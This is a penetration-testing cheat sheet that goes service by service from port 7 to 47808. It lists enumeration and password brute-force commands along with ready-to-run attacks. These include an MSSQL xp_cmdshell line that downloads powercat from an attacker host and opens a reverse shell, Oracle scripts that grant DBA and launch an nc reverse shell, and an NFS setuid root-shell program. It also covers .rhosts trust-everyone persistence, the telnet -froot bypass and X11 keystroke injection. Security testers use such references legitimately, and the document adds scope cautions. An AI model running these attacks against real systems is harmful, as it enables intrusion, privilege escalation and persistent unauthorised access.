Services
7 - Echo
nc -uvn <IP> 7
Hello echo    #This is what you send
Hello echo    #This is the response
21 - FTP
Fingerprint
telnet <IP> 21
use auxiliary/scanner/ftp/ftp_version
Anonymous access
ftp <IP>
> anonymous
> anonymous
> ls -ab
> binary
> ascii
> bye
nmap -sV --script ftp-anon -p 21 <IP>
Brute Force
# Password guessing can lock accounts and is noisy in logs: keep -t low and use a scoped user/password list
hydra -t 1 -l admin -P /root/Desktop/password.lst -vV <IP> ftp
nmap -sV --script ftp-brute -p 21 <IP>
use auxiliary/scanner/ftp/ftp_login
FTP Bounce Port Scanner
nmap -sV --script ftp-bounce -p 21 <IP>
use auxiliary/scanner/portscan/ftpbounce
Configuration files
ftpusers
ftp.conf
proftpd.conf
22 - SSH
Fingerprint/Enumerate
telnet <IP> 22 (banner grab)
use auxiliary/scanner/ssh/ssh_version
nmap --script ssh2-enum-algos -p 22 -n <IP>   # lists the KEX/cipher/MAC algorithms offered; legacy ones (CBC ciphers, SHA-1 MACs, small DH groups) are findings in their own right
nmap --script ssh-hostkey -p 22 -n <IP> --script-args ssh_hostkey=full
nmap --script sshv1 -p 22 -n <IP>   # any SSHv1 support is a finding
Brute Force
hydra -l root -p admin <IP> -t 4 ssh   # single-credential check; use -L/-P for lists and expect lockouts and log noise
use auxiliary/scanner/ssh/ssh_login
Configuration files
ssh_config
sshd_config
authorized_keys
ssh_known_hosts
.shosts
23 - Telnet
Fingerprint
telnet <IP>
nmap -p 23 <IP> --script telnet-encryption
use auxiliary/scanner/telnet/telnet_version
Brute Force
hydra -L usernames.txt -P passwords.txt <IP> telnet -V
nmap -p 23 --script telnet-brute --script-args userdb=<myusers.lst>,passdb=<mypwds.lst>,telnet-brute.timeout=8s <IP>
use auxiliary/scanner/telnet/telnet_login
# Solaris 10+ : authentication bypass by smuggling the login -f (pre-authenticated) option through the telnet username
telnet -l "-froot" hostname
Configuration files
/etc/inetd.conf
/etc/xinetd.d/telnet
/etc/xinetd.d/stelnet
25, 587 - SMTP
Fingerprint / SASL Methods
telnet <IP> 25
> ehlo me
openssl s_client -connect <IP>:25 -starttls smtp
> ehlo me
nmap --script smtp-commands.nse [--script-args smtp-commands.domain=<domain>] -pT:25,465,587 <IP>
use auxiliary/scanner/smtp/smtp_version
Enumerate users
VRFY username
EXPN username   # responses that differ for valid vs invalid users leak the account list; RCPT TO is the third method
nmap --script smtp-enum-users.nse [--script-args smtp-enum-users.methods={EXPN,...},...] -p 25,465,587 <IP>
use auxiliary/scanner/smtp/smtp_enum
Brute Force
nmap -p 25 --script smtp-brute <IP>
Open Mail Relay
# Manual relay test: use a sender domain and a recipient mailbox you control, so the relayed message proves the finding and reaches nobody else
HELO me
MAIL FROM: test@testdomain.com
RCPT TO: my_email@example.com
DATA 
Subject: This is a test mail 
From: Test User
To: Test Target
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
This is a test email for you to read.
.
QUIT
nmap -v --script=smtp-open-relay -p 25 <IP>
use auxiliary/scanner/smtp/smtp_relay
53 - DNS
DNS Enumeration
use auxiliary/gather/dns_srv_enum
use auxiliary/gather/enum_dns
nmap --script=dns-service-discovery -p 5353 <IP>
nmap --script=broadcast-dns-service-discovery <IP>
nmap --script dns-blacklist --script-args='dns-blacklist.ip=<ip>'
nmap -sSU -p 53 --script dns-nsid <IP>
nmap --script dns-srv-enum --script-args "dns-srv-enum.domain='example.com'"
Zones/Zone Transfer
nmap -sn -Pn ns1.example.com --script dns-check-zone --script-args='dns-check-zone.domain=example.com'
nmap --script dns-zone-transfer.nse --script-args dns-zone-transfer.domain=<domain> -p 53 <NS_IP>
dig axfr @<NS_IP> <domain>   # an AXFR that succeeds for an unauthorised client is the finding
Recursion
nmap -sU -p 53 --script=dns-recursion <IP>   # an open recursive resolver on an Internet-facing host is abusable for cache poisoning and amplification
DNS Lookup
host <Domain>
nslookup <Domain>  [server]
nslookup -type=ns <Domain>
dig [-4 | -6 ] @<Server> <Domain> <Type>
fierce -dns <domain>
python
>>> import socket
>>> socket.gethostbyname('www.google.com')
use auxiliary/gather/dns_info
Reverse DNS Lookup
dig [-4 | -6 ] -x <IP>
nslookup -type=ptr <IP>   # reverse lookups return PTR records, not NS
dnsrecon -r <startIP-endIP>
whois <IP> | grep -E "Creation|Created|Registration|created|Expiration|Expires|Email"
use auxiliary/gather/dns_reverse_lookup
Brute Force
nmap --script dns-brute www.example.com -sn -n -Pn
use auxiliary/gather/dns_bruteforce
DNS Amplification Scanner
auxiliary/scanner/dns/dns_amp
DNS Non-Recursive Record Scraper
nmap -sU -p 53 --script dns-cache-snoop.nse <IP>
use auxiliary/gather/dns_cache_scraper
Configuration Files
host.conf
resolv.conf
named.conf
69 - TFTP
Enumeration
tftp <IP> PUT local_file   # TFTP has no authentication; PUT writes to the server, so only do this where modifying the host is in scope
tftp <IP> GET conf.txt (or other files)
# Solarwinds TFTP server
tftp -i <IP> GET /etc/passwd (old Solaris)   # -i = binary (image) mode on the Windows tftp client
Bruteforcing
use auxiliary/scanner/tftp/tftpbrute
79 - Finger
User enumeration
finger root example.com
finger 'a b c d e f g h' @example.com
finger admin@example.com
finger user@example.com
finger 0@example.com
finger .@example.com
finger **@example.com
finger test@example.com
finger @example.com
nmap -sV -sC <target>
use auxiliary/scanner/finger/finger_users
Command execution
finger "|/bin/id@example.com"   # only works against very old fingerd builds that hand the query to a shell; an error is the normal result
finger "|/bin/ls -a /@example.com"
Finger Bounce
finger user@host@victim   # the finger daemon on host relays the query to victim, reaching hosts you cannot talk to directly
finger @internal@external
Funny Bit
Weather forecast
finger london@graph.no
80, 8080, 443 - Web Ports
Too much to be listed here: These are not the droids you are looking for.
88 - Kerberos
Enumerate Users
nmap -p 88 --script=krb5-enum-users --script-args="krb5-enum-users.realm='test'" <IP>   # set realm to the target's Kerberos realm (for AD usually the domain name in upper case)
110 - POP3
Enumeration
nmap -sV -sC <IP>
use auxiliary/scanner/pop3/pop3_version
Brute Force
nmap -sV --script=pop3-brute <IP>
use auxiliary/scanner/pop3/pop3_login
Retrieve email
telnet <IP> 110
> USER admin@<IP>
> PASS admin
# List all emails
> list
# Retrive email number 5, for example
> retr 5
111 - Portmapper
Enumerate RPC-based services
rpcinfo <IP>
rpcinfo -p <IP>
nmap -sSUC -p111 <IP>
RPCBind + NFS
Check for the NFS mounts using port 111
rpcinfo -p <IP> | grep -E 'nfs|mountd'   # rpcbind is the daemon; rpcinfo is the client that queries it
showmount -e <IP>
use auxiliary/scanner/nfs/nfsmount
113 - Ident
Enumeration
nmap -sV -sC <IP>
119 - NNTP Network News Transfer Protocol
Enumeration
nmap -p 119,433,563 --script nntp-ntlm-info <IP>
Brute Force
use auxiliary/scanner/nntp/nntp_login
123 - NTP
Enumeration
nmap -sU -p 123 --script ntp-info <IP>
nmap -sU -p 123 --script ntp-monlist.nse <IP>   # a monlist response means the server leaks its recent peers and can be abused for amplification
ntpq <IP>
> lpeers
> version
> readlist
> host
> hostname
> ntpversion
ntpdc -c monlist <IP>
ntpdc -c sysinfo <IP>
Mode 6 Query
ntpq -c rv <IP>
Configuration files
ntp.conf
135-139, 445 - NetBIOS
Enumeration
net view \\<IP>
use auxiliary/scanner/smb/smb_version
nbtscan -r 192.168.1.1/24
enum4linux -a <IP>
nmap --script=broadcast-netbios-master-browser <IP>
nmap --script=msrpc-enum <IP>
use exploit/windows/dcerpc/ms03_026_dcom   # an exploit, not an enumeration step: only relevant to unpatched legacy hosts and it can destabilise the target, so confirm scope first
Domain
nmblookup -A <DC_IP>
SMB/Samba shares
smbclient -L 10.10.10.10
smbclient //10.10.10.10/tmp
smbclient \\\\10.10.10.10\\ipc$ -U bob
smbclient //10.10.10.10/ipc$ -U bob
Null Session
net use \\<IP>\ipc$ "" /u:""
smbclient //TYPHOON/typhoon -I <IP> -N
Connecting with PSExec
use exploit/windows/smb/psexec   # needs valid admin credentials or a hash; it writes and starts a service binary on the target, which is noisy and leaves artefacts
Configuration Files
Smb.conf
lmhosts
135, 593 -  Microsoft Windows RPC Services and Microsoft RPC Services over HTTP
Enumeration
Endpoint Mapper Service Discovery
    use auxiliary/scanner/dcerpc/endpoint_mapper
Hidden DCERPC Service Discovery
    use auxiliary/scanner/dcerpc/hidden
Remote Management Interface Discovery
    use auxiliary/scanner/dcerpc/management
DCERPC TCP Service Auditor
    use auxiliary/scanner/dcerpc/tcp_dcerpc_auditor
rpcdump.py <IP>
161 - SNMP
Enumeration
nmap  -Pn -sU -p 161 --script=snmp-brute <IP>
nmap  -Pn -sU -p 161 --script=snmp-interfaces <IP>
Available nse scripts:
    snmp-brute.nse
    snmp-hh3c-logins.nse
    snmp-info.nse
    snmp-interfaces.nse
    snmp-ios-config.nse
    snmp-netstat.nse
    snmp-processes.nse
    snmp-sysdescr.nse
    snmp-win32-services.nse
    snmp-win32-shares.nse
    snmp-win32-software.nse
    snmp-win32-users.nse
snmpwalk -v <Version> -c <Community string> <IP>
Default Community Strings
        public
        private
        community
use auxiliary/scanner/snmp/snmp_enum
Bruteforce
onesixtyone -c /usr/share/doc/onesixtyone/dict.txt <IP>
# SNMPv3 username guessing over IPv6, reusing the community-string list as candidate user names
while IFS= read -r user; do
  printf '%s :' "$user"
  snmpget -v 3 -u "$user" "udp6:[<IPv6>]" 1.3.6.1.2.1.1.4.0
done < /usr/share/doc/onesixtyone/dict.txt
use auxiliary/scanner/snmp/snmp_login
Configuration files
snmp.conf
snmpd.conf
snmp-config.xml
264 - Check Point FireWall-1 Topology
Enumeration
use auxiliary/gather/checkpoint_hostname
389, 636 - LDAP
Enumeration
nmap -p 389 --script ldap-rootdse <IP>
ldapsearch -LLL -x -H ldap://<domain fqdn> -b '' -s base '(objectclass=*)'
ldapsearch -h <IP> -p 389 -x -s base -b '' "(objectClass=*)" "*" +
ldapsearch -h <IP> -p 389 -x -b "dc=example,dc=com"   # anonymous bind: a full listing here means the directory is readable without credentials
nmap -p 389 --script ldap-search --script-args 'ldap.username="cn=ldaptest,cn=users,dc=cqure,dc=net",ldap.password=ldaptest,ldap.qfilter=users,ldap.attrib=sAMAccountName' <IP>
Brute force
nmap -p 389 --script ldap-brute --script-args ldap.base='"cn=users,dc=cqure,dc=net"' <ip>
Configuration Files
General
containers.ldif
ldap.cfg
ldap.conf
ldap.xml
ldap-config.xml
ldap-realm.xml
slapd.conf
IBM SecureWay V3 server
V3.sas.oc
Microsoft Active Directory server
msadClassesAttrs.ldif
Netscape Directory Server 4
nsslapd.sas_at.conf
nsslapd.sas_oc.conf
OpenLDAP directory server
slapd.sas_at.conf
slapd.sas_oc.conf
Sun ONE Directory Server 5.1
75sas.ldif
500/1723 - PPTP/L2TP/VPN
Aggressive mode
ike-scan <IP> -M -A --id=123
Testing process would go as follows:
Scan for the IKE service
Enumerate transform sets and confirm Aggressive Mode support
Run IKEForce in enum mode to obtain a valid group name or ID
Obtain a valid hash using IKE-Scan
Crack the hash using OCLHashcat
Run IKEForce in brute mode to obtain valid XAUTH credentials
Authenticate using chosen client
Pwn to your heart's content
enumerate id
Test 1
ike-scan
python ikeforce.py <IP> -a
python ikeforce.py <IP> -e -t x x x x -w ./wordlists   # replace "x x x x" with the transform set (encryption, hash, auth, DH group) confirmed with ike-scan
Test 2
ike-scan -M <IP>
ike-scan -M <IP> -A
ike-scan -M <IP> -A --auth=65001
# Group-ID enumeration. Everything goes to ONE log file so that "grep -B2" below lands on the matching "Testing:" line.
while IFS= read -r group; do
  echo | tee -a /root/vpn_test
  echo "Testing: $group" | tee -a /root/vpn_test
  ike-scan -M <IP> -A --auth=65001 --id="$group" | tee -a /root/vpn_test
done < /root/groups.txt
grep "Handshake returned" -B2 /root/vpn_test
ike-scan -M <IP> -A --auth=65001 --id=ID -P/tmp/psk
psk-crack -d /usr/share/wordlists/metasploit/unix_passwords.txt /tmp/psk
502 - Modbus
Discover
nmap --script modbus-discover.nse --script-args='modbus-discover.aggressive=true' -p 502 <IP>   # aggressive mode probes every unit ID; ICS devices can be fragile, agree this with the asset owner first
512 - rexec
Access
rlogin <ipaddress>   # note: rexec (512) takes a cleartext username/password with every command, rlogin (513) relies on host trust via .rhosts
Brute Force
nmap -p 512 --script rexec-brute <IP>
use auxiliary/scanner/rservices/rexec_login
513 - rlogin
Enumeration
Find the files
    find / -name .rhosts
    locate .rhosts
Examine Files
    cat .rhosts
Subvert the files
    echo "+ +" > .rhosts   # host "+" user "+" = trust every user from every host; this is a persistence change on the target, record it and revert it
Manual Login
rlogin -l username <IP>
rlogin <IP>Brute force
nmap -p 513 --script rlogin-brute <ip>
hydra -L usernames.txt -P passwords.txt <IP> rlogin -V
use auxiliary/scanner/rservices/rlogin_login
514 - rsh
Enumeration
rsh <IP> <Command>Brute force
hydra -L usernames.txt rsh://<IP> -v -V
use auxiliary/scanner/rservices/rsh_login
548 - AFP - Apple Filing Protocol
Enumeration
nmap -sV -sC <IP>
nmap -sS -sV -p 548 --script=afp-ls <IP>
nmap -sV --script=afp-showmount <IP>
nmap -sV --script=afp-path-vuln <IP>
use auxiliary/scanner/afp/afp_server_info
Brute force
nmap -p 548 --script afp-brute <IP>
554, 8554 - RTSP
Enumeration
nmap -p 8554 -sV --script rtsp-methods <IP> 
nmap -p 554 --script rtsp-methods <ip>
Brute Force
nmap -p 554 --script rtsp-url-brute  <ip>
873 - Rsync
Enumeration
nmap -p 873 --script=rsync-list-modules <IP>
use auxiliary/scanner/rsync/modules_list
rsync -av --list-only rsync://<IP>/<module>   # check whether the listed modules are readable without authentication
1099 - Java RMI
Enumeration
use auxiliary/scanner/misc/java_rmi_server
Notable Exploits
Java RMI Server Insecure Default Configuration Java Code Execution
use exploit/multi/misc/java_rmi_server
Default configuration of rmiregistry allows loading classes from remote URLs
nmap --script=rmi-vuln-classloader -p 1099 <IP>
1433, 1434 - SQL Server
Metasploit
Queries the MSSQL instance for information
use auxiliary/scanner/mssql/mssql_ping
Default passwords
use auxiliary/scanner/mssql/mssql_login
Microsoft SQL Server Configuration Enumerator
use auxiliary/admin/mssql/mssql_enum
Microsoft SQL Server xp_cmdshell Command Execution
use auxiliary/admin/mssql/mssql_exec
# xp_cmdshell is off by default and enabling it needs sysadmin (EXEC sp_configure 'show advanced options',1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell',1; RECONFIGURE;)
# The payload below fetches powercat from an attacker-controlled host (10.0.0.1) and connects back to it; replace both addresses with your own infrastructure
EXEC xp_cmdshell 'powershell -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString("http://10.0.0.1:8080/powercat.ps1");powercat -c 10.0.0.1 -p 443 -e cmd'
Microsoft SQL Server SUSER_SNAME Windows Domain Account Enumeration
use auxiliary/admin/mssql/mssql_enum_domain_accounts
Microsoft SQL Server Find and Sample Data
use auxiliary/admin/mssql/mssql_findandsampledata
Microsoft SQL Server Generic Query
use auxiliary/admin/mssql/mssql_sql
MSSQL Schema Dump
use auxiliary/scanner/mssql/mssql_schemadump
Others
use auxiliary/admin/mssql/mssql_enum_domain_accounts_sqli
use auxiliary/admin/mssql/mssql_enum_sql_logins
use auxiliary/admin/mssql/mssql_escalate_dbowner
use auxiliary/admin/mssql/mssql_escalate_dbowner_sqli
use auxiliary/admin/mssql/mssql_escalate_execute_as
use auxiliary/admin/mssql/mssql_escalate_execute_as_sqli
use auxiliary/admin/mssql/mssql_idf
use auxiliary/admin/mssql/mssql_ntlm_stealer
use auxiliary/admin/mssql/mssql_ntlm_stealer_sqli
use auxiliary/admin/mssql/mssql_sql_file
use auxiliary/analyze/jtr_mssql_fast
use auxiliary/scanner/mssql/mssql_hashdump
Hacking SQL Server Stored Procedures
1494 - Citrix
Enumeration
1521 - Oracle
Oracle Enumeration
use auxiliary/scanner/oracle/tnslsnr_version
use auxiliary/scanner/oracle/sid_enum
Brute Force
nmap
nmap --script=oracle-sid-brute --script-args=oraclesids=/path/to/sidfile -p 1521-1560 <IP>
nmap --script=oracle-sid-brute -p 1521-1560 <IP>
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=ORCL <IP>
nmap --script oracle-brute-stealth -p 1521 --script-args oracle-brute-stealth.sid=ORCL <IP>
nmap --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt -p 1521-1560 <IP>
odat
./odat-libc2.5-x86_64 sidguesser -s <IP>
./odat-libc2.5-x86_64 passwordguesser -d XE -s <IP>   # Oracle profiles lock accounts after FAILED_LOGIN_ATTEMPTS failures; size the list accordingly
metasploit
use auxiliary/scanner/oracle/oracle_login
use auxiliary/scanner/oracle/sid_brute
PrivEsc
select * from session_privs;
select banner from v$version where banner like 'Oracle%';
Create function:
-- AUTHID CURRENT_USER plus an autonomous transaction: the idea is that when a higher-privileged session evaluates this function (through the index created below) the GRANT runs with that session's rights.
-- Note it creates a new account myuser/myuser on the target: record it for clean-up.
CREATE OR REPLACE FUNCTION GETDBA_mine(FOO varchar) return varchar deterministic authid current_user is pragma autonomous_transaction;
begin
execute immediate 'grant dba to myuser identified by myuser';
commit;
return 'FOO';
end;
/
Create index:
create index exploit_index_mine on SYS.DUAL(SCOTT.GETDBA_mine('BAR'));   -- assumes the function lives in the SCOTT schema; use the schema of the user you are logged in as
select user from sys.dual;
LOGIN WITH NEW USER - VIA RAZORSQL
select * from session_privs;
Start listener on Kali:
nc -lnvp 9999
Create job:
begin
dbms_scheduler.create_job( job_name => 'TEST',job_type =>
'EXECUTABLE',job_action => '/bin/nc',number_of_arguments => 4,start_date =>
SYSTIMESTAMP,enabled => FALSE,auto_drop => TRUE);
-- the job name in every call below must match the one passed to create_job
dbms_scheduler.set_job_argument_value('TEST', 1, 'KALI_IP');
dbms_scheduler.set_job_argument_value('TEST', 2, '9999');
dbms_scheduler.set_job_argument_value('TEST', 3, '-e');
dbms_scheduler.set_job_argument_value('TEST', 4, '/bin/bash');
dbms_scheduler.enable('TEST');
end;
-- requires CREATE JOB and CREATE EXTERNAL JOB, and a /bin/nc on the database host that supports -e
SQL Injection References
2049 - NFS
Enumeration
showmount -e <hostname/IP>
mount -t nfs <IP>:/directory_found_exported /local_directory
no_root_squash   # with this export option the client's root keeps uid 0 on the share, so files you create there as root are root-owned on the server
Case 1:
/* pwnme.c: compile on the attacker box, copy onto the mounted export as root, then execute it on the target */
#include <unistd.h>
int main(void) {
    setgid(0); setuid(0);
    execl("/bin/sh", "sh", (char *)NULL);   /* the argument list must be NULL-terminated; a bare 0 is not portable */
    return 1;
}
chown root.root ./pwnme
chmod u+s ./pwnme   # the setuid bit only takes effect if the target mounts the export without nosuid
Case 2:
cp /bin/bash local_shell   # take bash from the target itself (same architecture and libc), not from the attacker box
cat local_shell > spawn_root_shell   # written onto the export as root, so the server sees a root-owned file
chmod 4777 spawn_root_shell
./spawn_root_shell -p   # -p keeps the effective uid; bash drops it otherwise
Configuration Files
/etc/exports
/etc/lib/nfs/xtab
2301, 2381 - Compaq/HP Insight Manager
Enumeration
nmap -sV -p 2301,2381 <IP>
Configuration Files
path.properties
mx.log
CLIClientConfig.cfg
database.props
pg_hba.conf
jboss-service.xml
.namazurc
3260 - ISCSI
Enumeration
nmap -sV -p 3260 --script=iscsi-info <IP>
Exploitation
3306 - MySQL
Enumeration
nmap -A -n -p3306 <IP>
nmap -A -n -Pn --script=all -p3306 <IP>   # "all" includes the intrusive and dos categories; prefer --script=default,safe unless that is agreed
telnet <IP> 3306   # banner grab only; the SQL below needs a real client session (see "Quick testing")
use test; select * from test;   # the "test" database is accessible to any account on older MySQL installs
use auxiliary/scanner/mysql/mysql_version
use auxiliary/scanner/mysql/mysql_hashdump
mysql -u root -p -h <IP>
Quick testing
mysql -h <IP> -u root
mysql -h <IP> -u root
mysql -h <IP> -u root@localhost
mysql -h <IP>
mysql -h <IP> -u ""@localhost
Brute Force
use auxiliary/scanner/mysql/mysql_login
Privilege Escalation
Current Level of access
    mysql> select user();
    mysql> select user,password,create_priv,insert_priv,update_priv,alter_priv,delete_priv,drop_priv from user where user='OUTPUT OF select user()';
Access passwords
    mysql> use mysql
    mysql> select user,password from user;
Create a new user and grant him privileges (this is a persistent change on the target: record it and remove it afterwards)
    mysql> create user test identified by 'test';
    mysql> grant SELECT,CREATE,DROP,UPDATE,DELETE,INSERT on *.* to test WITH GRANT OPTION;   -- grants go to the account just created; "GRANT ... IDENTIFIED BY" is removed in MySQL 8
Break into a shell
    mysql> \! cat /etc/passwd
    mysql> \! bash   # \! runs on the host where the mysql CLIENT runs, so this is only a shell on the DB server if you are already on it
Configuration Files
windows
config.ini
my.ini
windows\my.ini
winnt\my.ini
/mysql/data/
unix
my.cnf
/etc/my.cnf
/etc/mysql/my.cnf
/var/lib/mysql/my.cnf
~/.my.cnf
/etc/my.cnf
Command History
~/.mysql.history
Log Files
connections.log
update.log
common.log
3389 - RDesktop
Network level auth NLA
nmap -p 3389 --script rdp-enum-encryption <IP>   # reports whether NLA is required and which security layers / encryption levels are offered
Brute Force
ncrack -vv --user Administrator -P /root/passwords.txt rdp://192.168.1.101   # RDP guessing locks domain accounts quickly; the built-in Administrator is often exempt from lockout, which is why it is the usual target
5000+ - Sybase
Enumeration
5060 - SIP
Enumeration
nc <IP> 5060
Configuration Files
SIPDefault.cnf
asterisk.conf
sip.conf
phone.conf
sip_notify.conf
.cfg
000000000000.cfg
phone1.cfg
sip.cfg etc. etc.
5432 - Postgresql
Enumeration
use auxiliary/scanner/postgres/postgres_version
Brute Force
use auxiliary/scanner/postgres/postgres_login
Exploitation
PostgreSQL 9.0, 9.1, and 9.2
use auxiliary/scanner/postgres/postgres_dbname_flag_injection
5555 - HPDataProtector
RCE
use exploit/multi/misc/hp_data_protector_exec_integutil
5900^ - VNC
Enumeration
use auxiliary/scanner/vnc/vnc_none_auth   # flags servers that accept the "None" security type, i.e. no password at all
Scan 5900^ for direct access. 5800 for HTTP access.
Brute Force
use auxiliary/scanner/vnc/vnc_login
Password Attacks
Registry Locations
    \HKEY_CURRENT_USER\Software\ORL\WinVNC3
    \HKEY_USERS\.DEFAULT\Software\ORL\WinVNC3
Decryption Key
    The stored VNC password is DES-encrypted with a fixed, publicly known key, so "encrypted" here only means obfuscated: anyone who can read the file or registry value can recover the cleartext.
    Key bytes (decimal): 23, 82, 107, 6, 35, 78, 88, 7   (hex: 17 52 6b 06 23 4e 58 07)
Default location where the VNC password is stored
~/.vnc/passwd
Configuration Files
.vnc
/etc/vnc/config
$HOME/.vnc/config
/etc/sysconfig/vncservers
/etc/vnc.conf
5984 - CouchDB
Enumeration
curl http://<IP>:5984/
curl -X GET http://<IP>:5984/_all_dbs
curl -X GET http://user:password@<IP>:5984/_all_dbs   # credentials in the URL end up in shell history and process listings; prefer curl -n with a .netrc entry
curl -X GET http://<IP>:5984/{dbname}/_all_docs
curl -X GET http://<IP>:5984/{dbname}/{id}
6000^ - X11
Enumeration
nmap -p 6000 --script=x11-access -n -vvv <IP>
use auxiliary/scanner/x11/open_x11
Screenshots
xwd -display <IP>:0 -root -out screenshot.xwd
If image is black, kill screensaver:
xwininfo -root -children -display <IP>:0
xkill -display <IP>:0 -id 0x3200001   # 0x3200001 = "gnome-screensaver" in this example; take the window id from the xwininfo output
Keyboard Command Injection
Manual
export DISPLAY=<IP>:0
xdotool type "id"
xdotool key KP_Enter
xdotool type "clear && history () bash && history"
xdotool key KP_Enter
# injected keystrokes go to whatever window has focus on the victim display and are visible to anyone sitting at it
Metasploit
use exploit/unix/x11/x11_keyboard_exec
Sniff the keyboard keystrokes
xspy <IP>
Configuration Files
/etc/Xn.hosts
/usr/lib/X11/xdm
Search through all files for the command "xhost +" or "/usr/bin/X11/xhost +" (it disables X access control entirely, so any host can connect to the display)
/usr/lib/X11/xdm/xsession
/usr/lib/X11/xdm/xsession-remote
/usr/lib/X11/xdm/xsession.0
/usr/lib/X11/xdm/xdm-config
DisplayManager*authorize:on
6379 - Redis
Enumeration
nmap -p 6379 --script redis-info <IP>
use auxiliary/scanner/redis/redis_server
use auxiliary/scanner/redis/redis_login
use auxiliary/scanner/redis/file_upload   # only works when the instance lets you run CONFIG SET (no auth, command not renamed); it writes an attacker-chosen file to disk on the server
Exploitation
9001, 9030 - Tor
Enumeration
nmap --script=tor-consensus-checker <IP>
9100 - PJL  - Jet Direct
Enumeration
nmap -p 9100 --script=pjl-ready-message.nse -n  <IP>
use auxiliary/scanner/printer/printer_version_info
9160 - Apache Cassandra
Enumeration
nmap -p 9160 -n --script=cassandra-info <IP>
Brute Force
nmap -p 9160 -n --script=cassandra-brute <IP>
10000 - NDMP - Network Data Management Protocol
Enumeration
nmap -sV <IP>
nmap -p 10000 --script ndmp-fs-info -n <IP>
11211 - Memcache
Enumeration
nmap -p 11211 --script memcached-info <IP>
telnet <IP> 11211
27017, 27018 - MongoDB
Enumeration
nmap -p 27017 -sV --script mongodb-info <IP>
nmap -p 27017 -sV --script mongodb-databases.nse <IP>
Brute Force
nmap 10.169.xx.xx -p 27017 -sV --script mongodb-brute -n
use auxiliary/scanner/mongodb/mongodb_login
44818 - EthernetIP-TCP-UDP
Enumeration
nmap -p 44818 -n --script enip-enumerate -Pn <IP>
47808 - UDP BACNet
Enumeration
nmap -sU -p 47808 -n -vvv --script BACnet-discover-enumerate --script-args full=yes <IP>